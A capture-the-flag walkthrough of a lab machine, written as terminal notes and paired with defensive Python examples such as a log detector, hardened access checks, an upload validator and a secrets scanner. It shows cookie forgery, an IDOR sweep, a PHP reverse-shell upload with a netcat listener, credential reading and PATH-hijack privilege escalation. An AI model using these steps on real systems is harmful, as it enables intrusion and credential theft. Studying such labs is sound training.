02.OOPSIE
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
* typically '-sV' is used with Nmap to determine versions, but that's not always enough
- adding -sC is another good way to determine service versions
- the -sC option runs the "safe" default scripts, which are designed to provide useful
information without being too intrusive or causing harm to the target systems
* use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
- the -Pn option treats all hosts as online and skips host discovery
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 22,80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)
* the -sC runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,80
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the services found on the scanned ports (here 22 and 80)
- e.g., weak configurations or known vulnerabilities in the ssh/http services
- if no results are found the service may be patched, or the NSE scripts may simply lack a check for the issue
#walk the application
root@htb:~$ BROWSER > {targetSite:port}
Services
We provide services to operate manufacturing data such as quotes,
customer requests etc. Please login to get access to the service.
* no visible login page identified
#crawl the webapp and conduct directory and page enumeration - either via fuzzing or crawling
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
Search: Proxy
root@oco:~$ BROWSER > Network Settings > Settings
Configure Proxy Access to the Internet
Manual Proxy Configuration: enabled
HTTP Proxy: 127.0.0.1
Port: 8080 {default Burp listening port}
Also Use this Proxy for HTTPS: enabled
* it is advisable to also check the option "Also use this proxy for FTP and HTTPS" in order to have all requests go through BurpSuite
#step 2: disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
Intercept is on: disabled
* Burp's intercept is enabled by default
#step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}
* can also simply refresh the page if already on the target site
#step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...
http://10.129.203.93
-> /
-> cdn-cgi
-> login
-> script.js
-> css
-> js
-> themes
#identification
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest
* can also brute force the page
* identify possible entry points on the webapp
- Account page
Access ID Name Email
2233 guest guest@megacorp.com
- Uploads page; this requires admin privileges
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
name value
role guest ...
user 2233 ...
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link
http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
* the guest account's id is exposed in the URL; the admin id can be enumerated by changing the id value manually or through automated means
#enumeration
root@htb:~$ BROWSER > http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
Access ID Name Email
34322 admin admin@megacorp.com
* enumerate for the admin account by changing the id value to something else until found
- admin info identified
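* added example, not from the original notes: the enumeration above leaves a clear trace in the web server log (one client requesting many distinct id values on the accounts page and getting 200s back). the Python below is a small detector for that pattern, run over constructed Apache access-log lines; the IPs, ids and timestamps are made up, and the path/parameter names are taken from the URL seen above.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample Apache access-log lines (not taken from the target).
# 10.10.14.215 walks sequential id values on the accounts page; 10.10.14.7
# makes two ordinary requests.
SAMPLE_LOG = """\
10.10.14.7 - - [17/Jan/2020:11:01:58 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=2 HTTP/1.1" 200 3320
10.10.14.215 - - [17/Jan/2020:11:02:01 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=2 HTTP/1.1" 200 3320
10.10.14.215 - - [17/Jan/2020:11:02:02 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=1 HTTP/1.1" 200 3310
10.10.14.215 - - [17/Jan/2020:11:02:03 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=3 HTTP/1.1" 200 3308
10.10.14.215 - - [17/Jan/2020:11:02:04 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=4 HTTP/1.1" 200 3310
10.10.14.215 - - [17/Jan/2020:11:02:05 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=5 HTTP/1.1" 200 3312
10.10.14.215 - - [17/Jan/2020:11:02:06 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=30 HTTP/1.1" 200 3321
10.10.14.7 - - [17/Jan/2020:11:02:09 +0000] "GET /cdn-cgi/login/admin.php?content=uploads HTTP/1.1" 200 2890
"""

# Combined log format: client ip, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, path, query-dict, status) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return m.group("ip"), parts.path, parse_qs(parts.query), int(m.group("status"))


def find_id_sweeps(lines, path="/cdn-cgi/login/admin.php", param="id", threshold=5):
    """Map client ip -> sorted distinct `param` values it fetched from `path` with a
    200 response, keeping only clients at or above `threshold` distinct values.
    A 200 on someone else's id means the app served a record it should have refused."""
    seen = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, req_path, query, status = parsed
        if req_path != path or status != 200 or param not in query:
            continue
        for value in query[param]:
            seen[ip].add(value)
    # numeric-looking sort so "30" lands after "5"
    return {ip: sorted(ids, key=lambda v: (len(v), v))
            for ip, ids in seen.items() if len(ids) >= threshold}


if __name__ == "__main__":
    for ip, ids in find_id_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {len(ids)} distinct ids ({', '.join(ids)})")
```

the threshold is deliberately low for the sample; on a real log, pair it with a time window and the session cookie so a legitimate admin browsing several accounts is not flagged.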
#exploit via changing cookie value
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
name value
role admin ...
user 34322 ...
* reload the page to escalate privilege to admin
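* added example, not the target's admin.php: a Python model of the two broken checks just abused (role read from a client cookie; requested account id never compared to the caller) next to the hardened form (opaque server-side session, ownership-or-admin check). the row ids, session ids and the in-memory tables are assumptions for the demo; the Access IDs mirror the guest/admin rows seen above.

```python
# Constructed in-memory account table (row ids are assumed; Access IDs mirror the page).
ACCOUNTS = {
    1: {"access_id": 34322, "name": "admin", "email": "admin@megacorp.com"},
    2: {"access_id": 2233, "name": "guest", "email": "guest@megacorp.com"},
}

# Server-side session store: the server, not the client, decides who a session is.
# Real session ids must be long random values; these are placeholders.
SESSIONS = {
    "sess-guest-001": {"user": 2233, "role": "guest"},
    "sess-admin-9f2": {"user": 34322, "role": "admin"},
}


def vulnerable_accounts_view(cookies, query):
    """Broken: 'role' and 'user' come straight from client cookies and the requested
    id is never compared with the caller, so any id the table holds is returned."""
    if cookies.get("role") not in ("guest", "admin"):
        return 401, None
    row = ACCOUNTS.get(int(query.get("id", 0)))
    return (200, row) if row else (404, None)


def vulnerable_uploads_view(cookies):
    """Broken: the admin-only page trusts the 'role' cookie the client sent."""
    return 200 if cookies.get("role") == "admin" else 403


def _session_from(cookies):
    return SESSIONS.get(cookies.get("session", ""))


def hardened_accounts_view(cookies, query):
    """Fixed: identity is looked up server-side from an opaque session id, and a
    caller may read only its own row unless the session's role is admin."""
    session = _session_from(cookies)
    if session is None:
        return 401, None
    try:
        row_id = int(query.get("id", ""))
    except ValueError:
        return 400, None
    row = ACCOUNTS.get(row_id)
    if row is None:
        return 404, None
    if session["role"] != "admin" and row["access_id"] != session["user"]:
        return 403, None
    return 200, row


def hardened_uploads_view(cookies):
    """Fixed: the role is read from the server-side session, never from a cookie value."""
    session = _session_from(cookies)
    if session is None:
        return 401
    return 200 if session["role"] == "admin" else 403


if __name__ == "__main__":
    guest_cookies = {"role": "guest", "user": "2233"}
    forged_cookies = {"role": "admin", "user": "34322"}
    print("vulnerable, guest asks for id=1:", vulnerable_accounts_view(guest_cookies, {"id": "1"}))
    print("vulnerable, forged role cookie on uploads:", vulnerable_uploads_view(forged_cookies))
    print("hardened, guest session asks for id=1:", hardened_accounts_view({"session": "sess-guest-001"}, {"id": "1"}))
    print("hardened, forged cookies on uploads:", hardened_uploads_view(forged_cookies))
```

the two fixes are independent: even with a proper session, the accounts view still needs the ownership check, otherwise the id sweep keeps working for any logged-in user.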
#upload a php reverse shell payload
root@oco:~$ curl -O https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php
root@oco:~$ nano php-reverse-shell.php
$ip = '{attackerIP}'; // CHANGE THIS
$port = {listeningPort}; // CHANGE THIS
root@oco:~$ nc -nlvp {listeningPort}
root@oco:~$ BROWSER > {targetSite:port} > upload
#find where the uploaded file was stored by the server
root@oco:~$ find / -iname directory-list* -type f 2>/dev/null
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .
#modify the wordlist and add the reverse shell file name
root@oco:~$ directory-list-2.3-small.txt
php-reverse-shell
* note: the server might change the filename as it gets uploaded as a security measure
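* added example, not the target's upload handler: renaming alone does not stop a PHP file in the web root from executing, so this Python shows what a proper upload check looks like (allow-listed extension that must match the file's magic bytes, server-chosen random name, no execute bit, store outside the document root). the store location is an assumption; the sample PNG/PHP blobs are constructed.

```python
import os
import secrets
import tempfile
from pathlib import Path

# Allow-listed extensions and the leading bytes a file of that type must have.
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}


def validate_upload(filename, data):
    """Return (True, ext) when the upload is acceptable, else (False, reason).
    The client-supplied extension and the content's magic bytes are both checked,
    so 'shell.php', 'shell.php.png' and PHP source named 'x.png' are all refused."""
    name = os.path.basename(filename.replace("\\", "/"))  # drop any directory part
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension is required"
    ext = parts[1]
    if ext not in ALLOWED_MAGIC:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match extension"
    return True, ext


def store_upload(filename, data, root):
    """Write an accepted upload under `root` with a server-chosen random name and a
    non-executable mode. Returns the stored Path, or None when rejected.
    `root` is meant to sit outside the web document root (assumed deployment choice),
    so even a file that slipped through would be served as bytes, never executed."""
    ok, ext_or_reason = validate_upload(filename, data)
    if not ok:
        return None
    root = Path(root)
    root.mkdir(parents=True, exist_ok=True)
    dest = root / f"{secrets.token_hex(16)}.{ext_or_reason}"
    with open(dest, "wb") as fh:
        fh.write(data)
    os.chmod(dest, 0o640)  # rw for the app user, read for its group, no execute bit
    return dest


def scratch_root():
    """Temporary directory standing in for the out-of-webroot upload store."""
    return tempfile.mkdtemp(prefix="uploads-")


# Constructed sample payloads: a minimal PNG header and a harmless PHP stub.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_PHP = b"<?php echo 'placeholder'; ?>"

if __name__ == "__main__":
    root = scratch_root()
    for name, blob in [("photo.png", SAMPLE_PNG), ("php-reverse-shell.php", SAMPLE_PHP),
                       ("shell.php.png", SAMPLE_PHP), ("notes.png", SAMPLE_PHP)]:
        stored = store_upload(name, blob, root)
        print(name, "->", stored if stored else validate_upload(name, blob)[1])
```

on the Apache side the same idea is enforced with a directory block that disables the PHP handler under the upload path, so that a misconfiguration in the app does not become code execution.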
root@oco:~$ gobuster dir --url http://{targetIP}/ --wordlist directory-list-2.3-small.txt -x php -r -t 50
/.php (Status: 403) [Size: 277]
/themes (Status: 403) [Size: 277]
/uploads (Status: 403) [Size: 277]
/css (Status: 403) [Size: 277]
/index.php (Status: 200) [Size: 10932]
/images (Status: 403) [Size: 277]
/js (Status: 403) [Size: 277]
/fonts (Status: 403) [Size: 277]
* the "dir" option refers to directory enumeration mode
* the --url specifies the target IP/URL
* the --wordlist specifies the wordlist to use
* the -x appends file extensions to each word in the wordlist
* can specify multiple extensions by separating them with commas
- php,html,txt
* the -r refers to "recursive fuzzing" (if a directory is found, it continues brute-forcing inside it)
* the -t sets the number of threads used, making the scan faster (default is 0)
- more threads could trigger rate-limiting or bans
root@oco:~$ curl http://{targetSite:port}/uploads/php-reverse-shell.php
root@oco:~$ nc....
listening on [any] 1234 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.6.196] 57704
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
11:14:29 up 41 min, 0 users, load average: 0.00, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
www-data@target:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#upgrade the shell to a fully interactive TTY session for post-exploitation
www-data@target:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
* use the pty module to spawn a new interactive Bash shell.
#privilege escalation...
www-data@target:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
* this will identify users on the system
www-data@target:~$ ls /home
robert
www-data@target:~$ ls /home/robert
user.txt
www-data@target:~$ cat /home/robert/user.txt
f2c74ee8db7983851ab2a96a44eb7981
#find ALL files where the user "robert" is mentioned
www-data@target:~$ find /var/www/html/ -type f -exec grep -iwl "robert" {} + 2>/dev/null
/var/www/html/cdn-cgi/login/db.php
* the + at the end of -exec batches multiple found files into a single grep invocation, which is much faster than running grep once per file
* the -w ensures a strict search for only the exact word "robert"
* -i makes the search case-insensitive (robert, ROBERT, Robert all match)
* -l lists only filenames (faster if you just need to know where "robert" appears)
* {} is a placeholder for each found file
www-data@target:~$ cat /var/www/html/cdn-cgi/login/db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
* hardcoded credentials found
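* added example, not from the original notes: the db.php above is exactly what a secrets scan over the web root should catch. the Python below looks for a literal password passed to mysqli_connect or assigned to a $password-style variable and reports it masked, run here over constructed PHP modelled on db.php (placeholder password, not the real one) and over the shape the fixed file should take (credentials pulled from the environment or a file outside the web root).

```python
import os
import re

# Constructed PHP source modelled on the db.php found on the target.
# The password value is a placeholder, not the real credential.
SAMPLE_DB_PHP = """<?php
$conn = mysqli_connect('localhost','robert','<placeholder-password>','garage');
?>
"""

# What the fixed file looks like: nothing secret lives in the source tree.
SAMPLE_FIXED_PHP = """<?php
// credentials come from the environment (or a config file outside the web root)
$conn = mysqli_connect(getenv('DB_HOST'), getenv('DB_USER'), getenv('DB_PASS'), getenv('DB_NAME'));
?>
"""

RULES = [
    # mysqli_connect(<plain arg>, <plain arg>, '<literal>' ...) ; args containing () such as
    # getenv('...') deliberately do not match
    ("mysqli_connect with literal password",
     re.compile(r"mysqli_connect\(\s*[^,()]+,\s*[^,()]+,\s*(['\"])(?P<secret>[^'\"]+)\1")),
    # $password = '...', $db_pass = "...", $pwd = '...'
    ("password variable assigned a literal",
     re.compile(r"\$\w*(?:pass(?:word)?|pwd)\w*\s*=\s*(['\"])(?P<secret>[^'\"]+)\1", re.I)),
]


def mask(secret):
    """Keep the first character so findings can be told apart without printing the secret."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""


def scan_source(text, path="<memory>"):
    """Return a list of (path, line_no, rule_name, masked_secret) findings for one file."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule_name, pattern in RULES:
            m = pattern.search(line)
            if m:
                findings.append((path, line_no, rule_name, mask(m.group("secret"))))
    return findings


def scan_tree(root, extensions=(".php", ".inc", ".ini", ".env")):
    """Walk `root` (e.g. a web document root) and scan every file with a listed extension."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(extensions):
                full = os.path.join(dirpath, fname)
                try:
                    with open(full, encoding="utf-8", errors="replace") as fh:
                        findings.extend(scan_source(fh.read(), full))
                except OSError:
                    continue
    return findings


if __name__ == "__main__":
    for finding in scan_source(SAMPLE_DB_PHP, "db.php") + scan_source(SAMPLE_FIXED_PHP, "db_fixed.php"):
        print(finding)
```

the variable rule is loose on purpose (it will also flag names like $bypass), which is the right trade-off for a scanner that a human reviews; the mysqli rule is strict and skips calls whose password argument is itself a function call.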
www-data@target:~$ su robert
Password: M3g4C0rpUs3r!
robert@oopsie:/$
robert@oopsie:/$ sudo -l
* list the commands that a user is allowed to run with sudo privileges on a system.
robert@oopsie:/$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
robert@oopsie:/$ find / -group {groupName} 2>/dev/null
/usr/bin/bugtracker
* this will search for files/executables that belong to the specified group
#check for the file privileges and type
robert@oopsie:/$ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped
* the "s" in the user execute position (rws) indicates that the file has the
setuid permission set. this means that when this binary is executed, it will run
with the permissions of the file's owner (in this case, root), not the user who
ran it.
- if a non-root user runs /usr/bin/bugtracker, the program will execute as the
root user (because root is the owner of the file), giving the user elevated
privileges.
robert@oopsie:/$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
10
---------------
cat: /root/reports/10: No such file or directory
victim@target:~$ touch /tmp/cat
victim@target:~$ echo "/bin/sh" > /tmp/cat
victim@target:~$ cat /tmp/cat
/bin/sh
victim@target:~$ chmod +x /tmp/cat
victim@target:~$ export PATH=/tmp:$PATH
* this will add the /tmp directory to the environment path
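* added example, not the bugtracker binary's code: the Python below models why the PATH trick works and how the binary should have been written, assuming (as the "cat: /root/reports/10" error suggests) that it runs cat by bare name on a path built from the id. it shows bare-name resolution along a PATH that has a scratch directory first, next to the hardened form: validate the id, call /bin/cat by absolute path, and pass a fixed environment. the report directory is taken from the error message above; the numeric-only id format and /bin/cat location are assumptions.

```python
import os
import re
import subprocess
import tempfile

REPORT_DIR = "/root/reports"             # from the page's cat error message
BUG_ID_RE = re.compile(r"^[0-9]{1,9}$")  # assumed format: digits only, so no '..' or ';'
SAFE_ENV = {"PATH": "/usr/bin:/bin"}     # fixed, trusted environment for any child process


def resolve_in_path(command, path_dirs):
    """Mimic how a bare command name is found: the first executable match wins.
    With a writable directory ahead of /bin (as after `export PATH=/tmp:$PATH`),
    a user-planted file of the same name shadows the real binary."""
    for d in path_dirs:
        candidate = os.path.join(d, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def build_report_command(bug_id):
    """Hardened form: validate the id, then name cat by absolute path so the
    caller's PATH is never consulted. Returns argv, or None if the id is rejected."""
    if not BUG_ID_RE.match(bug_id):
        return None
    return ["/bin/cat", os.path.join(REPORT_DIR, bug_id)]


def show_report(bug_id):
    """Run the hardened command with a sanitized environment; returns (rc, text)."""
    argv = build_report_command(bug_id)
    if argv is None:
        return 2, "invalid bug id\n"
    proc = subprocess.run(argv, env=SAFE_ENV, capture_output=True, text=True)
    return proc.returncode, proc.stdout or proc.stderr


def planted_path_demo():
    """Create a scratch dir holding a harmless stand-in 'cat' and show that a bare-name
    lookup with that dir first picks it up, while the hardened argv ignores PATH."""
    scratch = tempfile.mkdtemp(prefix="pathdemo-")
    fake = os.path.join(scratch, "cat")
    with open(fake, "w") as fh:
        fh.write("#!/bin/sh\necho stand-in cat\n")
    os.chmod(fake, 0o755)
    resolved = resolve_in_path("cat", [scratch, "/usr/bin", "/bin"])
    return resolved == fake, build_report_command("10")[0]


if __name__ == "__main__":
    shadowed, hardened_argv0 = planted_path_demo()
    print("bare-name lookup picked the planted file:", shadowed)
    print("hardened command always runs:", hardened_argv0)
    print("rejected id:", show_report("../root.txt"))
```

in the real C binary the equivalent is execve() with the absolute path and a sanitized envp instead of system() with a bare name, plus dropping to the caller's uid before anything that touches user-supplied input; the id validation also closes the path-traversal side of the same bug.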
victim@target:~$ bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
10
---------------
# whoami
root
# ls /root
reports root.txt
# grep -i .* /root/root.txt
grep: ..: Is a directory
/root/root.txt:af13b0bee69f8a877c3faf667f7beacf
* cat no longer works here because /tmp/cat (the planted /bin/sh wrapper) now shadows the real cat on PATH, so use grep instead
- the "grep: ..: Is a directory" line appears because the unquoted .* was glob-expanded by the shell into . and .., so grep took . as the pattern and tried to read .. as a file; quoting the pattern ('.*') avoids this